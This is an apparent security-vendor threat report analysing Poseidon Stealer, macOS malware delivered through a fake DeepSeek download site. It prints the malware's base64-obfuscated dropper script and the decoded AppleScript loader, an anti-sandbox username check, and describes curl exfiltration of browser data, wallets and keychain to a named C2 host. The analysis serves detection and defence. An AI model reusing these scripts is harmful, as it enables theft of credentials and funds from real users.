Fake DeepSeek Site Infects Mac Users with Poseidon Stealer

Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.

We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.

Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.

In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team…

What did we find?

In early February 2025, the eSentire Threat Response Unit (TRU) identified the usage of osascript to execute AppleScript associated with the Poseidon Stealer information-stealing malware.

Poseidon Stealer is sold as a Malware-as-a-Service (MaaS) and is advertised by the user “Rodrigo4” through Telegram/Hacking forums with pricing at $3,000 per month. The malware targets sensitive files/data associated with Chromium/Firefox based web browsers such as credit cards, saved passwords, bookmarks, and autofill entries, crypto-currency extension wallet data, Bitwarden Password Manager extension data, and Telegram’s tdata folder containing all session data, messages, images, etc.

Other notable behaviors include: the collection of comprehensive system information, exfiltration of the keychain database, and exfiltration of files from the Desktop, Downloads, and Documents directories matching the file extensions: "txt", "pdf", "docx", "wallet", "key", "keys", and "doc".

Payloads observed by TRU exhibit anti-debugging and string encryption techniques to hinder the malware analysis process. The infection process begins when the user is redirected to a fake DeepSeek site deepseek.exploreio[.]net via malvertising. The fake site is a near identical copy of the real DeepSeek site upon first glance until the user clicks “Start Now” the page redirects to a download page.

After the user clicks “Download for Mac OS”, a DMG file matching the pattern “DeepSeek_v.[0-9].[0-9]{2}.dmg” is downloaded from manyanshe[.]com.

Upon the user opening the downloaded DMG file, it is mounted and a window is shown as seen in the following figure. The user is directed to, “OPEN TERMINAL, DRAG AND DROP TO INSTALL THE APP”.

Unbeknownst to the user, the “DeepSeek” app shown isn’t actually an app, but rather a shell script. More specifically, the shell script file is stored in the DMG as “DeepSeek.file”. Regardless of whether the file has a “.sh” or “.file” file extension, when it is dragged and dropped into Terminal, it will be executed as a shell script.

Apple’s latest feature in GateKeeper on macOS Sequoia resolves the well-known GateKeeper bypass where users can control+click an app in the Finder and select "Open", therefore we suspect the usage of Terminal for initial access is likely to increase in popularity as time goes on, as threat actors will continue to focus on bypassing GateKeeper.

We have also observed the usage of “ClickFix” style popups on the fake sites as well, where users are deceived into running a command through the Terminal app. This technique serves the same purpose – to execute Poseidon Stealer.

The contents of the DeepSeek shell script can be seen below. The script is base64 encoded and decodes/executes the next stage of the shell script.

#!/bin/bash 
    
wDwyQrpH='IyEvYmluL2Jhc2gKb3Nhc2NyaXB0IC1lICdvbiBydW4KICAgIHRyeQogICAgICAgIHNldCB2b2x1bWVMaXN0IHRvIGxpc3QgZGlza3MKICAgIGVuZCB0cnkKICAgIHNldCBzZXR1cFZvbHVtZSB0byAiIgogICAgdHJ5CiAgICAgIC' 
     
IxOudLSd='AgcmVwZWF0IHdpdGggdm9sIGluIHZvbHVtZUxpc3QKICAgICAgICAgICAgaWYgdm9sIGNvbnRhaW5zICJEZWVwU2VlayIgdGhlbgogICAgICAgICAgICAgICAgc2V0IHNldHVwVm9sdW1lIHRvIHZvbAogICAgICAgICAgICAgICAgZXhpdCByZXBlYXQKICAgICAgICAgICAgZW5kIGlmCiAgICAgICAgZW5kIHJlcGVhdAogICAgZW5kIHRyeQogIC' 
 
SkkdUOuJ='AgaWYgc2V0dXBWb2x1bWUgaXMgIiIgdGhlbgogICAgICAgIHJldHVybgogICAgZW5kIGlmCiAgICBzZXQgc2NyaXB0RGlyIHRvICIvVm9sdW1lcy8iICYgc2V0dXBWb2x1bWUgJiAiLyIKICAgIHNldCBleGVjdXRhYmxlTmFtZSB0byAiLkRlZXBTZWVrIgogICAgc2V0IGV4ZWN1dGFibGVQYXRoIHRvIHNjcmlwdERpciAmIGV4ZWN1dGFibGVOYW1lCiAgICBzZXQgdG1wRXhlY3V0YWJsZVBhdGggdG8gIi90bXAvIiAmIGV4ZWN1dGFibGVOYW1lCiAgICB0cnkKICAgICAgICBkbyBzaGVsbCBzY3JpcHQgInJtIC1mICIgJiBxdW90ZWQgZm9ybSBvZiB0bXBFeGVjdXRhYmxlUGF0aAogICAgZW5kIHRyeQogICAgdHJ5CiAgICAgICAgZG8gc2hlbGwgc2NyaXB0ICJjcCAiICYgcXVvdGVkIGZvcm0gb2YgZXhlY3V0YWJsZVBhdGggJiAiICIgJiBxdW90ZWQgZm9ybSBvZiB0bXBFeGVjdXRhYmxlUGF0aAogICAgZW5kIHRyeQogICAgdHJ5CiAgICAgICAgZG8gc2hlbGwgc2NyaXB0ICJ4YXR0ciAtYyAiICYgcXVvdGVkIGZvcm0gb2YgdG1wRXhlY3V0YWJsZVBhdGgKICAgIGVuZCB0cnkKICAgIHRyeQogICAgICAgIGRvIHNoZWxsIHNjcmlwdCAiY2htb2QgK3ggIiAmIHF1b3RlZCBmb3JtIG9mIHRtcEV4ZWN1dGFibGVQYXRoCiAgICBlbmQgdHJ5CiAgICB0cnkKICAgICAgICBkbyBzaGVsbCBzY3JpcHQgcXVvdGVkIGZvcm0gb2YgdG1wRXhlY3V0YWJsZVBhdGgKICAgIGVuZCB0cnkKZW5kIHJ1bic=' 
 
funcname="${wDwyQrpH}${IxOudLSd}${SkkdUOuJ}" 
 
bash -c "$(echo "$funcname" | base64 --decode)" 
        

The next stage of the script copies the payload and executes it by performing the following actions:

1. Use the cp command to copy the Poseidon Stealer binary “.DeepSeek” from the mounted folder to “/tmp/.DeepSeek”.
2. Uses command xattr -c to clear existing file attributes on the binary.
3. Uses the command chmod +x to mark the binary executable.
4. Execute Poseidon Stealer binary via the do shell script AppleScript command.

#!/bin/bash 

osascript -e 'on run 

    try 

        set volumeList to list disks 

    end try 

    set setupVolume to "" 

    try 

        repeat with vol in volumeList 

            if vol contains "DeepSeek" then 

                set setupVolume to vol 

                exit repeat 

            end if 

        end repeat 

    end try 

    if setupVolume is "" then 

        return 

    end if 

    set scriptDir to "/Volumes/" & setupVolume & "/" 

    set executableName to ".DeepSeek" 

    set executablePath to scriptDir & executableName 

    set tmpExecutablePath to "/tmp/" & executableName 

    try 

        do shell script "rm -f " & quoted form of tmpExecutablePath 

    end try 

    try 

        do shell script "cp " & quoted form of executablePath & " " & quoted form of tmpExecutablePath 

    end try 

    try 

        do shell script "xattr -c " & quoted form of tmpExecutablePath 

    end try 

    try 

        do shell script "chmod +x " & quoted form of tmpExecutablePath 

    end try 

    try 

        do shell script quoted form of tmpExecutablePath 

    end try 

end run' 
        

Poseidon Stealer begins by creating a thread that makes use of two known techniques to determine if a debugger is attached. The first technique uses the ptrace() function, passing the PT_DENY_ATTACH for the first argument, which causes an exit with exit code 45 if a debugger is attached, effectively preventing analysis.

The next technique makes use of the sysctl() function in a while loop to retrieve information about the current process. The second argument to sysctl() contains the length of the amount of integers specified in the first parameter (0x4). Knowing this, we can map exactly what flags are being passed to sysctl().

CTL_KERN is for getting kernel specific information. KERN_PROC is next and causes sysctl() to return a struct with process entries. KERN_PROC_PID specifies the target process will be selected based on a process ID. The last integer is the current PID of the process that was previously acquired by calling getpid(). The output buffer struct is of type kinfo_proc, which contains a structure called kp_proc.

This structure contains a flag (p_flag) that describes the process state. The malware checks the p_flag by bitwise AND with 0x800 (P_TRACED flag). If the flag is found, the malware exits with exit code 0x1. This is followed by the thread sleeping for 4 seconds and the while loop continuing indefinitely.

The decompiled psuedo-code of the anti-debug function can be seen below.

After bypassing the anti-debug checks and string decryption, we can see more AppleScript executed via the system() function. The purpose of this AppleScript is to check the user’s username against the following known sandbox/researcher usernames: run, maria, jackiemac, and bruno. If any match, the malware exits with exit code –1.

osascript -e 'if (short user name of (system info)) is "maria" or (short user name of (system info)) is "run" or (short user name of (system info)) is "jackiemac" or (short user name of (system info)) is "bruno" then error number -1'

Next the malware executes more AppleScript via the system() function, executing the “disown” command followed by the “pkill” command to terminate any instances of Terminal.

disown; pkill Terminal

Finally, the malware executes the stealer functionality, again as AppleScript through system() and the oascript utility. The script is very large and can be seen in the Command Line section of the Indicators of Compromise here.

The script serves the following purposes:

1. Get the username and comprehensive system information.
2. Get cookies, bookmarks, autofills, credit cards, passwords, and crypto-wallet extension local data from Google Chrome/Chromium based web browsers.
3. Get cookies, login credentials, and history related files from Firefox based browsers.
4. Get sensitive wallet information including private keys for Desktop based crypto-currency wallets:
   1. Electrum
   2. Coinomi
   3. Exodus
   4. Atomic
   5. Wasabi
   6. Ledger Live
   7. Monero
   8. Bitcoin Core
   9. Litcoin Core
   10. Dash Core
   11. Electron Cash
   12. Guarda
   13. Dogecoin Core
   14. Trezor Suite
5. Steal files from the victim’s Desktop, Downloads, and Documents directories matching the file extensions: "txt", "pdf", "docx", "wallet", "key", "keys", "doc".
6. Steal the Keychain database file from “/Library/Keychains/login.keychain-db”.
7. Get all associated Telegram data.
8. Display a dialog to harvest the user’s login password. Note, the password is validated to ensure it is the correct password, otherwise the dialog is re-displayed.

   

9. Zip and send all of the collected data to the C2 at 82.115.223[.]9/contact via POST request through curl. An example zip archive (extracted) that is sent to the C2 can be seen below. The “Chromium” folder contains stolen cookies, passwords, bookmarks, credit cards, etc. from any Chromium based browser(s). The “FileGrabber” folder contains harvested files from the user’s Desktop, Downloads, and Documents directory, as well as Safari cookies. The "FileGrabber” folder also stores data collected from any matching browser extensions IDs included in the table below. The “info” file contains the user’s comprehensive system information. The “keychain” file contains the keychain database containing all secrets saved to keychain. The “pwd” file contains the stolen password from the user. The “username” file contains the user’s username.

Targeted extensions for Google Chrome and other Chromium based web browsers can be seen in the following table:

What did we do?

• Our team of 24/7 SOC Cyber Analysts proactively isolated the affected host to contain the infection on the customer’s behalf.
• We communicated what happened with the customer and helped them with remediation efforts.

What can you learn from this TRU Positive?

• Poseidon Stealer is a sophisticated information stealer targeting macOS users via social engineering tactics to gain a foothold and harvest/exfiltrate highly sensitive data from Telegram, web browsers, crypto-currency wallets, passwords, cookies, credit cards, and other sensitive information.

Recommendations from the Threat Response Unit (TRU):

• Restrict access to the osascript command (and/or other commands observed in the Command Line section of the Indicators of Compromise) via Managed Device Management (MDM).
• Use this attack scenario in user education, specifically the usage of Terminal as an entry point for initial access.
• Use a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) solution to detect and contain threats.

Indicators of Compromise

• Indicators of Compromise can be accessed here.

References

• https://www.esentire.com/blog/poseidon-stealer-uses-sora-ai-lure-to-infect-macos
• https://cyble.com/blog/deepseeks-growing-influence-surge-frauds-phishing-attacks/
• https://9to5mac.com/2024/10/17/security-bite-hackers-are-now-directing-users-to-terminal-to-bypass-gatekeeper-in-macos-sequoia/
• https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html